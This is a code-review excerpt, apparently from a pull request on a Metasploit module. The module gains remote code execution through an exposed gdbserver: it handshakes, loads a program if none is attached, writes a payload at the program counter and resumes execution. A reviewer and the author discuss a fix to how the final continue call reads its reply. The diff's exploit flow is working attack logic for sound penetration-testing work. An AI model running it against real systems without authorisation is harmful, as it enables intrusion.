modules/exploits/multi/gdb/gdb_server_exec.rb

```diff
@@ -43,35 +53,40 @@ def initialize(info = {})
   def exploit
     connect
 
-    print_status "Performing handshake with gdbserver..."
+    print_status('Performing handshake with gdbserver...')
     handshake
 
-    enable_extended_mode
+    res = enable_extended_mode
+    if res !~ /OK/
+      fail_with(Failure::UnexpectedReply, 'Could not enable extended mode.')
+    end
 
     begin
-      print_status "Stepping program to find PC..."
+      print_status('Stepping program to find PC...')
       gdb_data = process_info
     rescue BadAckError, BadResponseError
       # gdbserver is running with the --multi flag and is not currently
       # attached to any process. let's attach to /bin/true or something.
-      print_status "No process loaded, attempting to load /bin/true..."
-      run(datastore['EXE_FILE'])
+      print_status("No process loaded, attempting to load #{datastore['EXE_FILE']}...")
+      res = run_file(datastore['EXE_FILE'])
+      if res !~ /OK/
+        fail_with(Failure::UnexpectedReply, 'Could not load new program.')
+      end
       gdb_data = process_info
     end
 
     gdb_pc, gdb_arch = gdb_data.values_at(:pc, :arch)
 
-    unless payload.arch.include? gdb_arch
+    unless payload.arch.include?(gdb_arch)
       fail_with(Failure::BadConfig, "The payload architecture is incorrect: the payload is #{payload.arch.first}, but #{gdb_arch} was detected from gdb.")
     end
 
-    print_status "Writing payload at #{gdb_pc}..."
+    print_status("Writing payload at #{gdb_pc}...")
     write(payload.encoded, gdb_pc)
 
-    print_status "Executing the payload..."
+    print_status('Executing the payload...')
     continue
```

Comment:
Not to scope creep you too much but could we make this change?
```suggestion
    continue({read: true})
```
I ask because although it seems to work on Arm I get an error see below
![image](https://user-images.githubusercontent.com/19910435/165101338-8f1db953-3d60-40f4-bdcd-478c6febf740.png)

Seems to come from reading the response here: https://github.com/rapid7/metasploit-framework/blob/ac9380e0a28a83519a4d643bbd5c16bdddfa9f48/lib/msf/core/exploit/remote/gdb.rb#L146
but as far as I can tell we don't use it and isn't needed

Reply:
Makes sense. We don't need the reply. I've applied the change, but haven't tested.